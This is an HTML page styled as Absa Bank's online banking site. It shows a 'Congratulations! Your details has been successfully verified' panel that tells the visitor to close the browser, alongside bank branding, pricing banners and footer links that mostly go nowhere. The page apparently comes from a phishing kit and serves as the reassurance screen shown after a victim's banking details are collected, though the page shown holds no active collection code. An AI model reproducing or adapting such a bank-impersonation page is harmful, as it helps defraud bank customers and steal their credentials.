<html class="js webkit webkit537_36 safari3 CSS1Compat Linux x86_64"><head>
		

		<style type="text/css">.btl-repaint{zoom:1;background-color:transparent;-moz-outline:none;}</style>
		<style type="text/css">.btl-drag-outlineElement{position:absolute;top:-10000px;left:-10000px;width:100px;height:100px;z-index:9999;border-width:1px;border-style:solid;background-color:#DFE0E1;border-color:#8B8D91;}</style>
		<style type="text/css">.btl-resize-cursorElement{position:absolute;top:-10000px;left:-10000px;width:100px;height:100px;z-index:10000;opacity:0;-ms-filter:"alpha(opacity=0)";filter:alpha(opacity=0);background:white;}.btl-resize-lineElement{position:absolute;top:-10000px;left:-10000px;width:1px;height:100px;z-index:9999;border-width:1px;border-style:solid;border-color:#8B8D91;overflow:hidden;}.btl-resize-outlineElement{position:absolute;top:-10000px;left:-10000px;width:100px;height:100px;z-index:9999;border-width:1px;border-style:solid;opacity:.4;-ms-filter:"alpha(opacity=40)";filter:alpha(opacity=40);background-color:#DFE0E1;border-color:#8B8D91;}</style>
		<meta http-equiv="X-UA-Compatible" content="IE=10; IE=9; IE=8">
		
		
		
		<title>Absa Online</title>
		<!--#if expr="( = /iPhone/)"-->
		<link rel="apple-touch-icon" href="images/Iphone_app_icon.png">
		<!--#endif -->
		
		
		
		<link rel="stylesheet" type="text/css" href="css/absa.css?v=0.1.0-2021-12-23-11-57-54" media="screen">
		<link rel="stylesheet" type="text/css" href="css/login.css?v=0.1.0-2021-12-23-11-57-54">
		<link rel="stylesheet" type="text/css" href="css/jcaptcha.css?v=0.1.0-2021-12-23-11-57-54">
		
		<link rel="shortcut icon" type="image/ico" href="images/favicon.ico">
		
		
		<!-- Device Profiling -->
		
			<!-- PS: These below 2 calls were added so that IE11 can also work -->
	
		
		<!-- <script type="text/javascript" src="static/script/absa/absa.SVM.js?v=0.1.0-2021-12-23-11-57-54"></script> -->

		

	</head>
	<body class="ssr-enabled ap-jsp-body prelogin" id="bodydiv" sid="w86qpl-uktbAiEILNdSZq78">
		
		<!-- Please wait splash -->
	
		<div style="position:fixed; top:0px; left:0px; z-index:105; width:100%; height:54px; background:#FFFFFF; padding:10px 0px 0px 10px; box-shadow: 0 4px 8px 0 rgba(0,0,0,.16);">
			<img src="images/logo-red.png" width="44" height="44">
		</div>
		
		<div class="ap-page-header" style="z-index:106;">
			
				<!-- <div style="padding-top:12px;"><img src="static/style/resources/absa-logo-2018.png" width="141" height="97" /></div> -->
			
			<div class="ap-navigation-main" style="z-index:107;">
				<div class="ap-tabStrip-rounded-left"></div>
				<ul class="ap-tabStrip-tabs">
					<li class="ap-tab-button ap-tab-active" id="SSR-tab-18">
						<div class="ap-tab-title" tabindex="10">Logon</div>
						<div class="ap-tab-title-hidden">Logon</div>
					</li>
					<li class="ap-tab-button" id="SSR-tab-19">
						
							<div class="ap-tab-title" tabindex="11"><a href="#">Registration</a></div>
						
						<div class="ap-tab-title-hidden">Registration</div>
					</li>
					<!-- <li class='ap-tab-button' id='SSR-tab-20'>
						<div class="ap-tab-title" tabindex="12"><a href="http://www.absa.co.za">Absa home page</a></div>
						<div class="ap-tab-title-hidden" style="font-size:14px;">%=xl.getLabel("Common/General/Label/AbsaHomePage",lang) %</div>
					</li> -->
					<li class="ap-tab-button" id="SSR-tab-20">
						<div class="ap-tab-title" tabindex="12"><a href="#" target="_new">How to guide</a></div>
						<div class="ap-tab-title-hidden" style="font-size:14px;">How to guide</div>
					</li>
				</ul>
				<div class="ap-tabStrip-rounded-right"></div>
				<div style="clear: both;"></div>
				<!-- <img src="static/style/resources/ao-logo2.png" width="189" height="60" style="position:absolute;top:0;right:20px" id="theImg"/> -->
				<div class="ap-navigation-sub ap-tabStrip-subnav"></div>
			</div>
		</div>
		
		<div class="ap-page-container" style="z-index:104;">
			<!-- PS: above div  ap-page-header   was HERE -->
			
			<div class="ap-global-message" id="ap-global-message">
				<div id="ap-nocookies-msg" style="display: none;">
					Warning: you do not have Cookies enabled. This applications needs Cookies to function
					properly. Please turn it on and reload the page. If you need assistance
					in turning on your Cookies <a>click here</a> to get instructions.
				</div>
				<noscript>
					<div>
						Warning: you do not have Javascript enabled. This
						applications needs Javascript to function properly. Please turn it on
						and reload the page. If you need assistance in turning on your
						Javascript <a>click here</a> to get instructions.
					</div>
				</noscript>
			</div>
			
			<div class="ap-main-content-wrapper">
				<!-- Page top corners -->
				<div class="ap-main-content-wrapper-top">
					<div class="ap-corners-rounded-top-left"></div>
					<div class="ap-corners-rounded-top"></div>
					<div class="ap-corners-rounded-top-right"></div>
				</div>
				
				<!-- Page content -->
				<div class="ap-page-content ap-container">
					<div class="ap-container-highlevel">
						<div class="ap-titlebar ap-heading-titlebar" style="padding-top: 0px;">
							<div id="header_results" class="ap-bar-section ap-bar-title" style="color: #FFFFFF">
								Logon&nbsp;
								| Welcome to Absa Online
							</div>
							<!-- Contact US -->
							<div id="header_results_contactUs" style="position:relative; float:right; padding:10px;">
								<a href="#" style="color:#FFFFFF; font-size:12px; font-weight:bold; text-decoration:none;">
									Contact us
								</a>
							</div>
						</div>
						
						
						<div class="ap-container-content" id="ap-container-content" style="padding-bottom:5px; overflow: hidden"><!-- PS: height must be set here to AUTO else it cuts of the bottom of the inner content -->
							
							<div class="ap-login-columns ap-columns-2-lhs" style="padding-top: 0px;">
								<!-- ap-column-1 -->
								<div class="ap-column-1" style="width: 656px;padding:0">
									<div id="ap-login-container" class="ap-login-container">

<div class="ap-container-highlevel" style="width:656px; ">
	<div class="ap-titlebar ap-heading-titlebar ap-heading-titlebar-login" style=" display: flex;
  justify-content: center;
  align-items: center;">
		<div class="ap-bar-section ap-bar-title" style="margin-top:8px;">Authorisation completed
</div>
	</div>
	
	
	<div style="height: 315px;width: 654px; background-color: #FFFFFF;
border-right: 1px solid #CBC7C6;
border-left: 1px solid #CBC7C6; display: flex;
  justify-content: center;
  align-items: center;"><form style="position:relative"><h1 style="text-align: center; font-size: 2.0rem; padding-bottom: 30px;"><i style="display: inline-block; width: 20px; height: 22px;
    background-repeat: no-repeat;
    background-position: center center;
    margin-right: 0.7rem;
    position: relative;
    top: 3px; background-image: url(images/sgcm.svg);">  </i>Congratulations!
</h1>
<div style="text-align: center; padding-bottom: 4px;font-size: 1.45rem;color:green;">Your details has been successfully verified.<br>
</div>
<div style="text-align: center; padding-bottom: 30px;font-size: 1.45rem;color:green;">Please close down your browser for update to take effect.<br>
</div>



<div style="text-align: center;">Thank you</div></form>

</div>
	
	<div class="ap-container-bottom-corners">
		<div class="ap-corners-rounded-bottom-left"></div>
		<div class="ap-corners-rounded-bottom" style="width:640px;"></div>
		<div class="ap-corners-rounded-bottom-right"></div>
	</div>
	
</div>

</div>
								</div>
								
								<!-- ap-column-2 -->
								<div class="ap-column-2 " id="ap-column-2" style="width:280px">
									
									<div id="divadds1" style="position:relative; width:280px; margin-bottom:10px;">
										<!-- Security Center Links -->
										
										
										<!-- Important Links on Right Side of Page -->
										<div style="float:right; width:270px;">
											<div id="divsecuritycentre" class="ap-login-block-rounded">
												<!-- top round borders -->
												<div class="ap-login-block-rounded-top">
													<div class="ap-corners-rounded-top-left"></div>
													<div class="ap-corners-rounded-top"></div>
													<div class="ap-corners-rounded-top-right"></div>
												</div>
												
												<!-- content -->
												<div role="tablist" class="ui-tabBox">
													<ul class="ui-tabHeads">
														<li aria-selected="true" class="ui-tabHead ui-tab-selected-logon ui-tab-selected" role="button" tabindex="18">
															Useful information
															<span class="vi-screenreader-line "> [selected] 1 of 1 [tab].</span>
														</li>
													</ul>
													<div class="ui-tabBodies">
														<div tabindex="19" role="tabpanel" class="ui-tabBody ui-tabBody-selected" aria-hidden="true">
															<div style="background: #FFFFFF;">
																<!-- <ul class="abc">
																	%=xl.getLinkListItems("Login/SecurityCenter",lang) %
																</ul> -->
																<ul class="abc">
																	<li><a href="#" id="am">Grandmark International Pty Ltd</a></li><li><a href="#" id="am">Explore more ways to do your banking</a></li><li><a href="#" id="am">2022 rates and fees</a></li><li><a href="#" id="am"><b style="color:#AF154B !important;">Planned Maintenance</b></a></li>
																</ul>
															</div>
														</div>
													</div>
												</div>
												
												<!-- bottom round borders -->
												<div class="ap-login-block-rounded-bottom">
													<div class="ap-corners-rounded-bottom-left"></div>
													<div class="ap-corners-rounded-bottom"></div>
													<div class="ap-corners-rounded-bottom-right"></div>
												</div>
											</div>
										</div>
										<div style="clear:both;"></div>
										<div style="position:relative; margin-top:10px; height:152px;">
											
											<div class="ap-login-campaign-image img2" style="position:absolute; top:0px; right:0px; width:270px;"><a href="#"><img src="images/AOL_Retail_Pricing_2022_Eng.jpg" alt=""></a></div>
										</div>
									</div>
									
									<!-- How it Works Right of 2nd page -->
									<div id="divhowitworks" class="ap-login-block-rounded" style="display:none">
										<div>
											<!-- top round borders -->
											<div class="ap-login-block-rounded-top">
												<div class="ap-corners-rounded-top-left"></div>
												<div class="ap-corners-rounded-top" style="width:312px;"></div>
												<div class="ap-corners-rounded-top-right"></div>
											</div>
											<!-- content -->
											<div role="tablist" class="ui-tabBox">
												<ul class="ui-tabHeads">
													<li aria-selected="true" class="ui-tabHead ui-tab-selected" role="button" tabindex="15">
														How it works
														<span class="vi-screenreader-line "> [selected] 1 of 1 [tab].</span>
													</li>
												</ul>
												<div class="ui-tabBodies">
													<div tabindex="16" role="tabpanel" class="ui-tabBody ui-tabBody-selected">
														<div style="background: #FFFFFF;">
															<div style="border-bottom: 1px solid #CCCCCC;">
																<div style="padding: 10px;">In this example the password is <b>Password1</b></div>
															</div>
															<div style="margin: 10px 0px 10px 10px;"><span class="pfsmalltxt">P</span>
																<span class="pfsmalltxt">a</span> <span class="pfsmalltxt">s</span>
																<span class="pfsmalltxt">s</span> <span class="pfsmalltxt">w</span>
																<span class="pfsmalltxt">o</span> <span class="pfsmalltxt">r</span>
																<span class="pfsmalltxt">d</span> <span class="pfsmalltxt">1</span>
															</div>
															<div style="margin: 10px 0px 5px 10px;">
																<input type="password" class="pfsmall pf2" name="dpf1" disabled="true" tabindex="17" maxlength="1" value="">
																<input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="2">
																<input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="3">
																<input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="4">
																<input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="5">
																<input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="6">
																<input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="7">
																<input type="password" class="pfsmall pf2" name="dpf1" disabled="true" tabindex="17" maxlength="1" value="">
																<input type="password" class="pfsmall pf2" name="dpf1" disabled="true" tabindex="17" maxlength="1" value="">
															</div>
															<div style="border-top: 1px solid #CCCCCC; border-bottom: 1px solid #CCCCCC; padding: 10px;">
																You have to enter (case sensitive):
															</div>
															<div style="margin: 10px 0px 10px 10px;"><span class="pfsmalltxt">P</span>
																<span class="pfsmalltxt">&nbsp;&nbsp;</span> <span class="pfsmalltxt">&nbsp;&nbsp;</span>
																<span class="pfsmalltxt">&nbsp;&nbsp;</span> <span class="pfsmalltxt">&nbsp;&nbsp;</span>
																<span class="pfsmalltxt">&nbsp;&nbsp;</span> <span class="pfsmalltxt">&nbsp;</span>
																<span class="pfsmalltxt">d</span> <span class="pfsmalltxt">1</span>
															</div>
															<div style="margin: 10px 0px 5px 10px;">
																<input type="password" class="pfsmall pf2" name="dpf1" disabled="true" tabindex="17" maxlength="1" value="">
																<input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="2">
																<input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="3">
																<input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="4">
																<input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="5">
																<input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="6">
																<input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="7">
																<input type="password" class="pfsmall pf2" name="dpf1" disabled="true" tabindex="17" maxlength="1" value="">
																<input type="password" class="pfsmall pf2" name="dpf1" disabled="true" tabindex="17" maxlength="1" value="">
															</div>
															<br>
														</div>
													</div>
												</div>
											</div>
											<!-- bottom round borders -->
											<div class="ap-login-block-rounded-bottom">
												<div class="ap-corners-rounded-bottom-left"></div>
												<div class="ap-corners-rounded-bottom" style="width:312px;"></div>
												<div class="ap-corners-rounded-bottom-right"></div>
											</div>
										</div>
										
										<div class="ap-login-campaign-image img3" style="padding: 14px 0px 1px 0px;" id="ap-campaignImage-div"><a href="https://www.absa.co.za/pricing/"><img src="images/AOL_Retail_Pricing_2022_Eng.jpg" alt=""></a></div>
										<div class="ap-login-campaign-image img3" style="padding: 14px 0px 1px 0px;" id="ap-campAPBImage-div"><a href="https://www.absa.co.za/rates-and-fees/personal-banking/"><img src="images/AOL_Private_Pricing_2022_Eng.jpg" alt="Payment History"></a></div>
									</div>
								</div>
								<!-- ap-column-2 -->
								<div class="ap-columns-clear"></div>
							</div>
							
							<!-- ap-columns-2-lhs -->
							<div style="width: 100%; height: 10px;"></div>
							
							<!-- 3 column layout -->
							<div id="divbottomadds" class="ap-login-columns ap-columns-33">
								<!-- ap-column-1 -->
								<div class="ap-column-1">
									
									<!-- Security Centre Links Bottom left of Login page 1 -->
									<!-- PS: Was moved for Resonance to be next to input fields -->
									&nbsp;
								</div>
								
								<!-- ap-column-2 -->
								<div class="ap-column-2">
									<!-- Campaign Banner 1 used to be here -->
									&nbsp;
								</div>
								
								<!-- ap-column-3 -->
								<div class="ap-column-3">
									<!-- Campaign Banner 2 used to be here -->
									&nbsp;
								</div>
							</div>
						</div>
						
						<!-- bottom rounded corners -->
						<!-- <div class="ap-container-bottom ap-heading-titlebar-item ap-container-bottom-show"> -->
						<div class="ap-container-bottom ap-heading-titlebar-item ap-container-bottom-hide">
							<div class="ap-corners-rounded-bottom-left"></div>
							<div class="ap-corners-rounded-bottom"></div>
							<div class="ap-corners-rounded-bottom-right"></div>
						</div>
					</div>
				</div>
				
				<!-- Page bottom corners -->
				<div class="ap-main-content-wrapper-bottom">
					<div class="ap-corners-rounded-bottom-left"></div>
					<div class="ap-corners-rounded-bottom"></div>
					<div class="ap-corners-rounded-bottom-right"></div>
				</div>
			</div>
			
			<div class="ap-footer" tabindex="20">
				<div style="position:relative; top:0px; left:0px; width:971px; text-align:center;">
					<p tabindex="21">
						© Copyright. Absa Bank Limited. Registration Number: 1986/004794/06&nbsp;
						Authorized financial services and registered credit provider NCRCP7
					</p>
					<div class="ap-footer-links">
						<ul><li><a href="#" id="am">Security centre</a></li><li><a href="#" id="am">Terms of use</a></li><li><a href="#" id="am">Privacy policy</a></li><li><a href="#" id="am">Software requirements</a></li><li><a href="#" id="am">Banking regulations</a></li></ul>
					</div>
					<!-- Barclays Logo Link bottom right of page -->
					<div style="position:absolute; top:0px; right:0px; width:220px; text-align:right;">
						<!-- <a href="http://www.barclays.com" target="_new"><img src="static/style/resources/barclays_logo.gif" border="0" alt="Member of the Barclays group"></a> -->
						<!-- =xl.getImage("Images/Image/Barclays",lang) -->
					</div>
				</div>
			</div>
		</div>
		
		
		<!-- password tips -->
		
		
		<!-- LOGOUT POPUP -->
		
		
		
		<!-- Generic Modal -->
		
		
		
		<!-- hidden stuff -->
		
		
		<div></div>
		
		<!-- Please wait controller -->
		

	
	



</body></html>
